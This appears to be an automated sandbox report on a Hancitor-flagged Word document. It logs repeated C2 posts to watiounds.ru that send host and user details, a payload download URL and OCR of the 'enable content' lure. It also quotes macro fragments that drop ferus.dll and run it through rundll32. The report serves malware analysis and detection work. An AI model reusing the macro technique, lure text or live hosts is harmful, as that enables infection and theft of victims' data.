              Source: global trafficHTTP traffic detected: POST /8/forum.php HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: watiounds.ruContent-Length: 110Cache-Control: no-cacheData Raw: 47 55 49 44 3d 36 37 30 30 36 30 32 39 38 30 30 33 32 30 35 30 34 31 32 26 42 55 49 4c 44 3d 32 36 30 34 5f 67 74 68 65 77 71 26 49 4e 46 4f 3d 39 32 38 31 30 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29 Data Ascii: GUID=6700602980032050412&BUILD=2604_gthewq&INFO=928100 @ user-PC\user&EXT=&IP=84.17.52.3&TYPE=1&WIN=6.1(x64)
              Source: global trafficHTTP traffic detected: POST /8/forum.php HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: watiounds.ruContent-Length: 110Cache-Control: no-cacheData Raw: 47 55 49 44 3d 36 37 30 30 36 30 32 39 38 30 30 33 32 30 35 30 34 31 32 26 42 55 49 4c 44 3d 32 36 30 34 5f 67 74 68 65 77 71 26 49 4e 46 4f 3d 39 32 38 31 30 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29 Data Ascii: GUID=6700602980032050412&BUILD=2604_gthewq&INFO=928100 @ user-PC\user&EXT=&IP=84.17.52.3&TYPE=1&WIN=6.1(x64)
              Source: global trafficHTTP traffic detected: POST /8/forum.php HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: watiounds.ruContent-Length: 110Cache-Control: no-cacheData Raw: 47 55 49 44 3d 36 37 30 30 36 30 32 39 38 30 30 33 32 30 35 30 34 31 32 26 42 55 49 4c 44 3d 32 36 30 34 5f 67 74 68 65 77 71 26 49 4e 46 4f 3d 39 32 38 31 30 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29 Data Ascii: GUID=6700602980032050412&BUILD=2604_gthewq&INFO=928100 @ user-PC\user&EXT=&IP=84.17.52.3&TYPE=1&WIN=6.1(x64)
              Source: global trafficHTTP traffic detected: POST /8/forum.php HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: watiounds.ruContent-Length: 110Cache-Control: no-cacheData Raw: 47 55 49 44 3d 36 37 30 30 36 30 32 39 38 30 30 33 32 30 35 30 34 31 32 26 42 55 49 4c 44 3d 32 36 30 34 5f 67 74 68 65 77 71 26 49 4e 46 4f 3d 39 32 38 31 30 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29 Data Ascii: GUID=6700602980032050412&BUILD=2604_gthewq&INFO=928100 @ user-PC\user&EXT=&IP=84.17.52.3&TYPE=1&WIN=6.1(x64)
              Source: global trafficHTTP traffic detected: POST /8/forum.php HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: watiounds.ruContent-Length: 110Cache-Control: no-cacheData Raw: 47 55 49 44 3d 36 37 30 30 36 30 32 39 38 30 30 33 32 30 35 30 34 31 32 26 42 55 49 4c 44 3d 32 36 30 34 5f 67 74 68 65 77 71 26 49 4e 46 4f 3d 39 32 38 31 30 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29 Data Ascii: GUID=6700602980032050412&BUILD=2604_gthewq&INFO=928100 @ user-PC\user&EXT=&IP=84.17.52.3&TYPE=1&WIN=6.1(x64)
              Source: global trafficHTTP traffic detected: POST /8/forum.php HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: watiounds.ruContent-Length: 110Cache-Control: no-cacheData Raw: 47 55 49 44 3d 36 37 30 30 36 30 32 39 38 30 30 33 32 30 35 30 34 31 32 26 42 55 49 4c 44 3d 32 36 30 34 5f 67 74 68 65 77 71 26 49 4e 46 4f 3d 39 32 38 31 30 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29 Data Ascii: GUID=6700602980032050412&BUILD=2604_gthewq&INFO=928100 @ user-PC\user&EXT=&IP=84.17.52.3&TYPE=1&WIN=6.1(x64)
              Source: global trafficHTTP traffic detected: POST /8/forum.php HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: watiounds.ruContent-Length: 110Cache-Control: no-cacheData Raw: 47 55 49 44 3d 36 37 30 30 36 30 32 39 38 30 30 33 32 30 35 30 34 31 32 26 42 55 49 4c 44 3d 32 36 30 34 5f 67 74 68 65 77 71 26 49 4e 46 4f 3d 39 32 38 31 30 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29 Data Ascii: GUID=6700602980032050412&BUILD=2604_gthewq&INFO=928100 @ user-PC\user&EXT=&IP=84.17.52.3&TYPE=1&WIN=6.1(x64)
              Source: global trafficHTTP traffic detected: POST /8/forum.php HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: watiounds.ruContent-Length: 110Cache-Control: no-cacheData Raw: 47 55 49 44 3d 36 37 30 30 36 30 32 39 38 30 30 33 32 30 35 30 34 31 32 26 42 55 49 4c 44 3d 32 36 30 34 5f 67 74 68 65 77 71 26 49 4e 46 4f 3d 39 32 38 31 30 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29 Data Ascii: GUID=6700602980032050412&BUILD=2604_gthewq&INFO=928100 @ user-PC\user&EXT=&IP=84.17.52.3&TYPE=1&WIN=6.1(x64)
              Source: global trafficHTTP traffic detected: POST /8/forum.php HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: watiounds.ruContent-Length: 110Cache-Control: no-cacheData Raw: 47 55 49 44 3d 36 37 30 30 36 30 32 39 38 30 30 33 32 30 35 30 34 31 32 26 42 55 49 4c 44 3d 32 36 30 34 5f 67 74 68 65 77 71 26 49 4e 46 4f 3d 39 32 38 31 30 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29 Data Ascii: GUID=6700602980032050412&BUILD=2604_gthewq&INFO=928100 @ user-PC\user&EXT=&IP=84.17.52.3&TYPE=1&WIN=6.1(x64)
              Source: global trafficHTTP traffic detected: POST /8/forum.php HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: watiounds.ruContent-Length: 110Cache-Control: no-cacheData Raw: 47 55 49 44 3d 36 37 30 30 36 30 32 39 38 30 30 33 32 30 35 30 34 31 32 26 42 55 49 4c 44 3d 32 36 30 34 5f 67 74 68 65 77 71 26 49 4e 46 4f 3d 39 32 38 31 30 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29 Data Ascii: GUID=6700602980032050412&BUILD=2604_gthewq&INFO=928100 @ user-PC\user&EXT=&IP=84.17.52.3&TYPE=1&WIN=6.1(x64)
              Source: global trafficHTTP traffic detected: POST /8/forum.php HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: watiounds.ruContent-Length: 110Cache-Control: no-cacheData Raw: 47 55 49 44 3d 36 37 30 30 36 30 32 39 38 30 30 33 32 30 35 30 34 31 32 26 42 55 49 4c 44 3d 32 36 30 34 5f 67 74 68 65 77 71 26 49 4e 46 4f 3d 39 32 38 31 30 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29 Data Ascii: GUID=6700602980032050412&BUILD=2604_gthewq&INFO=928100 @ user-PC\user&EXT=&IP=84.17.52.3&TYPE=1&WIN=6.1(x64)
              Source: global trafficHTTP traffic detected: POST /8/forum.php HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: watiounds.ruContent-Length: 110Cache-Control: no-cacheData Raw: 47 55 49 44 3d 36 37 30 30 36 30 32 39 38 30 30 33 32 30 35 30 34 31 32 26 42 55 49 4c 44 3d 32 36 30 34 5f 67 74 68 65 77 71 26 49 4e 46 4f 3d 39 32 38 31 30 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29 Data Ascii: GUID=6700602980032050412&BUILD=2604_gthewq&INFO=928100 @ user-PC\user&EXT=&IP=84.17.52.3&TYPE=1&WIN=6.1(x64)
              Source: global trafficHTTP traffic detected: POST /8/forum.php HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: watiounds.ruContent-Length: 110Cache-Control: no-cacheData Raw: 47 55 49 44 3d 36 37 30 30 36 30 32 39 38 30 30 33 32 30 35 30 34 31 32 26 42 55 49 4c 44 3d 32 36 30 34 5f 67 74 68 65 77 71 26 49 4e 46 4f 3d 39 32 38 31 30 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29 Data Ascii: GUID=6700602980032050412&BUILD=2604_gthewq&INFO=928100 @ user-PC\user&EXT=&IP=84.17.52.3&TYPE=1&WIN=6.1(x64)
              Source: global trafficHTTP traffic detected: POST /8/forum.php HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: watiounds.ruContent-Length: 110Cache-Control: no-cacheData Raw: 47 55 49 44 3d 36 37 30 30 36 30 32 39 38 30 30 33 32 30 35 30 34 31 32 26 42 55 49 4c 44 3d 32 36 30 34 5f 67 74 68 65 77 71 26 49 4e 46 4f 3d 39 32 38 31 30 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29 Data Ascii: GUID=6700602980032050412&BUILD=2604_gthewq&INFO=928100 @ user-PC\user&EXT=&IP=84.17.52.3&TYPE=1&WIN=6.1(x64)
              Source: global trafficHTTP traffic detected: POST /8/forum.php HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: watiounds.ruContent-Length: 110Cache-Control: no-cacheData Raw: 47 55 49 44 3d 36 37 30 30 36 30 32 39 38 30 30 33 32 30 35 30 34 31 32 26 42 55 49 4c 44 3d 32 36 30 34 5f 67 74 68 65 77 71 26 49 4e 46 4f 3d 39 32 38 31 30 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29 Data Ascii: GUID=6700602980032050412&BUILD=2604_gthewq&INFO=928100 @ user-PC\user&EXT=&IP=84.17.52.3&TYPE=1&WIN=6.1(x64)
              Source: global trafficHTTP traffic detected: POST /8/forum.php HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: watiounds.ruContent-Length: 110Cache-Control: no-cacheData Raw: 47 55 49 44 3d 36 37 30 30 36 30 32 39 38 30 30 33 32 30 35 30 34 31 32 26 42 55 49 4c 44 3d 32 36 30 34 5f 67 74 68 65 77 71 26 49 4e 46 4f 3d 39 32 38 31 30 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29 Data Ascii: GUID=6700602980032050412&BUILD=2604_gthewq&INFO=928100 @ user-PC\user&EXT=&IP=84.17.52.3&TYPE=1&WIN=6.1(x64)
              Source: global trafficHTTP traffic detected: POST /8/forum.php HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: watiounds.ruContent-Length: 110Cache-Control: no-cacheData Raw: 47 55 49 44 3d 36 37 30 30 36 30 32 39 38 30 30 33 32 30 35 30 34 31 32 26 42 55 49 4c 44 3d 32 36 30 34 5f 67 74 68 65 77 71 26 49 4e 46 4f 3d 39 32 38 31 30 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29 Data Ascii: GUID=6700602980032050412&BUILD=2604_gthewq&INFO=928100 @ user-PC\user&EXT=&IP=84.17.52.3&TYPE=1&WIN=6.1(x64)
              Source: global trafficHTTP traffic detected: POST /8/forum.php HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: watiounds.ruContent-Length: 110Cache-Control: no-cacheData Raw: 47 55 49 44 3d 36 37 30 30 36 30 32 39 38 30 30 33 32 30 35 30 34 31 32 26 42 55 49 4c 44 3d 32 36 30 34 5f 67 74 68 65 77 71 26 49 4e 46 4f 3d 39 32 38 31 30 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29 Data Ascii: GUID=6700602980032050412&BUILD=2604_gthewq&INFO=928100 @ user-PC\user&EXT=&IP=84.17.52.3&TYPE=1&WIN=6.1(x64)
              Source: global trafficHTTP traffic detected: POST /8/forum.php HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: watiounds.ruContent-Length: 110Cache-Control: no-cacheData Raw: 47 55 49 44 3d 36 37 30 30 36 30 32 39 38 30 30 33 32 30 35 30 34 31 32 26 42 55 49 4c 44 3d 32 36 30 34 5f 67 74 68 65 77 71 26 49 4e 46 4f 3d 39 32 38 31 30 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29 Data Ascii: GUID=6700602980032050412&BUILD=2604_gthewq&INFO=928100 @ user-PC\user&EXT=&IP=84.17.52.3&TYPE=1&WIN=6.1(x64)
              Source: global trafficHTTP traffic detected: POST /8/forum.php HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: watiounds.ruContent-Length: 110Cache-Control: no-cacheData Raw: 47 55 49 44 3d 36 37 30 30 36 30 32 39 38 30 30 33 32 30 35 30 34 31 32 26 42 55 49 4c 44 3d 32 36 30 34 5f 67 74 68 65 77 71 26 49 4e 46 4f 3d 39 32 38 31 30 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29 Data Ascii: GUID=6700602980032050412&BUILD=2604_gthewq&INFO=928100 @ user-PC\user&EXT=&IP=84.17.52.3&TYPE=1&WIN=6.1(x64)
              Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_001C28D0 lstrlenA,lstrlenA,InternetCrackUrlA,InternetConnectA,HttpOpenRequestA,InternetCloseHandle,InternetQueryOptionA,InternetSetOptionA,HttpSendRequestA,HttpQueryInfoA,InternetReadFile,InternetCloseHandle,InternetCloseHandle,3_2_001C28D0
              Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{1BC642F3-025D-4403-9DBE-B492A11253DC}.tmp
              Source: global trafficHTTP traffic detected: GET / HTTP/1.1Accept: */*User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: api.ipify.orgCache-Control: no-cache
              Source: rundll32.exe, 00000002.00000002.3150687914.0000000001AA0000.00000002.00000001.sdmp, rundll32.exe, 00000003.00000002.3150833774.0000000001BF0000.00000002.00000001.sdmpString found in binary or memory: Please visit http://www.hotmail.com/oe to learn more. equals www.hotmail.com (Hotmail)
              Source: unknownDNS traffic detected: queries for: api.ipify.org
              Source: unknownHTTP traffic detected: POST /8/forum.php HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: watiounds.ruContent-Length: 110Cache-Control: no-cacheData Raw: 47 55 49 44 3d 36 37 30 30 36 30 32 39 38 30 30 33 32 30 35 30 34 31 32 26 42 55 49 4c 44 3d 32 36 30 34 5f 67 74 68 65 77 71 26 49 4e 46 4f 3d 39 32 38 31 30 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29 Data Ascii: GUID=6700602980032050412&BUILD=2604_gthewq&INFO=928100 @ user-PC\user&EXT=&IP=84.17.52.3&TYPE=1&WIN=6.1(x64)
              Source: rundll32.exeString found in binary or memory: http://api.ipify.org
              Source: rundll32.exe, 00000003.00000002.3150581095.00000000000C0000.00000040.00000001.sdmp, rundll32.exe, 00000003.00000002.3150671775.00000000001C0000.00000040.00000001.sdmpString found in binary or memory: http://api.ipify.org0.0.0.0ncdrlebGUID=%I64u&BUILD=%s&INFO=%s&EXT=%s&IP=%s&TYPE=1&WIN=%d.%d(x64)GUID
              Source: rundll32.exe, 00000003.00000002.3150780627.0000000000424000.00000004.00000001.sdmpString found in binary or memory: http://caperesto.com/8/forum.php
              Source: rundll32.exe, 00000003.00000003.2806499777.0000000000404000.00000004.00000001.sdmp, rundll32.exe, 00000003.00000002.3150687210.00000000002BA000.00000004.00000001.sdmpString found in binary or memory: http://gru77.ru/6fdsg45ehdf.exe
              Source: rundll32.exe, 00000003.00000002.3150687210.00000000002BA000.00000004.00000001.sdmpString found in binary or memory: http://gru77.ru/6fdsg45ehdf.exe.ru/6fdsg45ehdf.exe99
              Source: rundll32.exe, 00000002.00000002.3150687914.0000000001AA0000.00000002.00000001.sdmp, rundll32.exe, 00000003.00000002.3150833774.0000000001BF0000.00000002.00000001.sdmpString found in binary or memory: http://investor.msn.com
              Source: rundll32.exe, 00000002.00000002.3150687914.0000000001AA0000.00000002.00000001.sdmp, rundll32.exe, 00000003.00000002.3150833774.0000000001BF0000.00000002.00000001.sdmpString found in binary or memory: http://investor.msn.com/
              Source: rundll32.exe, 00000002.00000002.3150904427.0000000001C87000.00000002.00000001.sdmp, rundll32.exe, 00000003.00000002.3151008908.0000000001DD7000.00000002.00000001.sdmpString found in binary or memory: http://localizability/practices/XML.asp
              Source: rundll32.exe, 00000002.00000002.3150904427.0000000001C87000.00000002.00000001.sdmp, rundll32.exe, 00000003.00000002.3151008908.0000000001DD7000.00000002.00000001.sdmpString found in binary or memory: http://localizability/practices/XMLConfiguration.asp
              Source: rundll32.exe, 00000003.00000002.3151836031.0000000003290000.00000002.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.
              Source: rundll32.exe, 00000002.00000002.3150904427.0000000001C87000.00000002.00000001.sdmp, rundll32.exe, 00000003.00000002.3151008908.0000000001DD7000.00000002.00000001.sdmpString found in binary or memory: http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Check
              Source: rundll32.exe, 00000003.00000002.3150780627.0000000000424000.00000004.00000001.sdmpString found in binary or memory: http://watiounds.ru/8/forum.php
              Source: rundll32.exe, 00000002.00000002.3150904427.0000000001C87000.00000002.00000001.sdmp, rundll32.exe, 00000003.00000002.3151008908.0000000001DD7000.00000002.00000001.sdmpString found in binary or memory: http://windowsmedia.com/redir/services.asp?WMPFriendly=true
              Source: rundll32.exe, 00000003.00000002.3151836031.0000000003290000.00000002.00000001.sdmpString found in binary or memory: http://www.%s.comPA
              Source: rundll32.exe, 00000002.00000002.3150687914.0000000001AA0000.00000002.00000001.sdmp, rundll32.exe, 00000003.00000002.3150833774.0000000001BF0000.00000002.00000001.sdmpString found in binary or memory: http://www.hotmail.com/oe
              Source: rundll32.exe, 00000002.00000002.3150904427.0000000001C87000.00000002.00000001.sdmp, rundll32.exe, 00000003.00000002.3151008908.0000000001DD7000.00000002.00000001.sdmpString found in binary or memory: http://www.icra.org/vocabulary/.
              Source: rundll32.exe, 00000002.00000002.3150687914.0000000001AA0000.00000002.00000001.sdmp, rundll32.exe, 00000003.00000002.3150833774.0000000001BF0000.00000002.00000001.sdmpString found in binary or memory: http://www.msnbc.com/news/ticker.txt
              Source: rundll32.exe, 00000003.00000002.3150833774.0000000001BF0000.00000002.00000001.sdmpString found in binary or memory: http://www.windows.com/pctv.

              System Summary:

              Malicious sample detected (through community Yara rule)
              Source: 00000003.00000002.3150671775.00000000001C0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Hancitor Payload Author: kevoreilly
              Source: 00000003.00000002.3150667690.00000000001B0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Hancitor Payload Author: kevoreilly
              Source: 3.2.rundll32.exe.1c0000.3.raw.unpack, type: UNPACKEDPEMatched rule: Hancitor Payload Author: kevoreilly
              Source: 3.2.rundll32.exe.1b0000.2.unpack, type: UNPACKEDPEMatched rule: Hancitor Payload Author: kevoreilly
              Source: 3.2.rundll32.exe.1c0000.3.unpack, type: UNPACKEDPEMatched rule: Hancitor Payload Author: kevoreilly
              Source: 3.2.rundll32.exe.1b0000.2.raw.unpack, type: UNPACKEDPEMatched rule: Hancitor Payload Author: kevoreilly
              Source: 3.2.rundll32.exe.c0174.0.unpack, type: UNPACKEDPEMatched rule: Hancitor Payload Author: kevoreilly
              Source: 3.2.rundll32.exe.c0174.0.raw.unpack, type: UNPACKEDPEMatched rule: Hancitor Payload Author: kevoreilly
              Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
              Source: Screenshot number: 4Screenshot OCR: Enable editing txjtton from the yellow bar above 0= you have enabled edmng. please click Engble c
              Source: Document image extraction number: 0Screenshot OCR: Enable editing button from the yellow bar above Once you have enabled editing, please click Enabl
              Source: Document image extraction number: 0Screenshot OCR: Enable content button from the yellow bar above
              Source: Screenshot number: 8Screenshot OCR: Enable content button from the yellow bar i above i , , , , , ' : ii: ^ a S nmmm O I
              Document contains an embedded VBA macro which may execute processes
              Source: 0427_5079687843613.docOLE, VBA macro line: kkl = Application.Run("hi", Folders(N))
              Source: 0427_5079687843613.docOLE, VBA macro line: kkl = Application.Run("hi", RootPath)
              Source: 0427_5079687843613.docOLE, VBA macro line: bcsa = Application.Run("Getme", Left(klas, ntgs) & yer)
              Source: 0427_5079687843613.docOLE, VBA macro line: kkx = Application.Run("nyd", myhome, plop & "\ferus.d" & "l" & "l")
              Source: 0427_5079687843613.docOLE, VBA macro line: lassap = Application.Run("nm", ololow)
              Source: VBA code instrumentationOLE, VBA macro: Module Module1, Function Getme, API Microsoft Word:Application.Run("hi","c:\users\user\appdata\Local\Temp")Name: Getme
              Source: VBA code instrumentationOLE, VBA macro: Module Module2, Function hhhhh, API Microsoft Word:Application.Run("Getme","c:\users\user\appdata\Local\Temp")Name: hhhhh
              Source: VBA code instrumentationOLE, VBA macro: Module Module2, Function hi, API Microsoft Word:Application.Run("nyd","c:\users\user\appdata\Local\Temp","c:\users\user\appdata\roaming\microsoft\word\ferus.dll")Name: hi
              Source: VBA code instrumentationOLE, VBA macro: Module ThisDocument, Function stetptwwo, API IWshShell3.Run("rundll32.exe c:\users\user\appdata\roaming\microsoft\word\ferus.dll,YYUNXEGQRYS")Name: stetptwwo
              Document contains an embedded VBA macro with suspicious strings
              Source: 0427_5079687843613.docOLE, VBA macro line: Set xcvxv = VBA.CreateObject("WScript.Shell")
              Source: VBA code instrumentationOLE, VBA macro: Module ThisDocument, Function stetptwwo, String wscript: Set xcvxv = VBA.CreateObject("WScript.Shell")Name: stetptwwo
              Office process drops PE file
              Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\AppData\Local\Temp\furmt.f
              Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: 76E20000 page execute and read and write
              Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: 76D20000 page execute and read and write
              Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_0018B4CE3_2_0018B4CE
              Source: 0427_5079687843613.docOLE, VBA macro line: Private Sub Document_Open()
              Source: VBA code instrumentationOLE, VBA macro: Module ThisDocument, Function Document_OpenName: Document_Open
              Source: 0427_5079687843613.docOLE indicator, VBA macros: true
              Source: C:\Windows\SysWOW64\rundll32.exeCode function: String function: 00183980 appears 51 times
              Source: 00000003.00000002.3150671775.00000000001C0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Hancitor author = kevoreilly, description = Hancitor Payload, cape_type = Hancitor Payload
              Source: 00000003.00000002.3150667690.00000000001B0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Hancitor author = kevoreilly, description = Hancitor Payload, cape_type = Hancitor Payload
              Source: 3.2.rundll32.exe.1c0000.3.raw.unpack, type: UNPACKEDPEMatched rule: Hancitor author = kevoreilly, description = Hancitor Payload, cape_type = Hancitor Payload
              Source: 3.2.rundll32.exe.1b0000.2.unpack, type: UNPACKEDPEMatched rule: Hancitor author = kevoreilly, description = Hancitor Payload, cape_type = Hancitor Payload
              Source: 3.2.rundll32.exe.1c0000.3.unpack, type: UNPACKEDPEMatched rule: Hancitor author = kevoreilly, description = Hancitor Payload, cape_type = Hancitor Payload
              Source: 3.2.rundll32.exe.1b0000.2.raw.unpack, type: UNPACKEDPEMatched rule: Hancitor author = kevoreilly, description = Hancitor Payload, cape_type = Hancitor Payload
              Source: 3.2.rundll32.exe.c0174.0.unpack, type: UNPACKEDPEMatched rule: Hancitor author = kevoreilly, description = Hancitor Payload, cape_type = Hancitor Payload
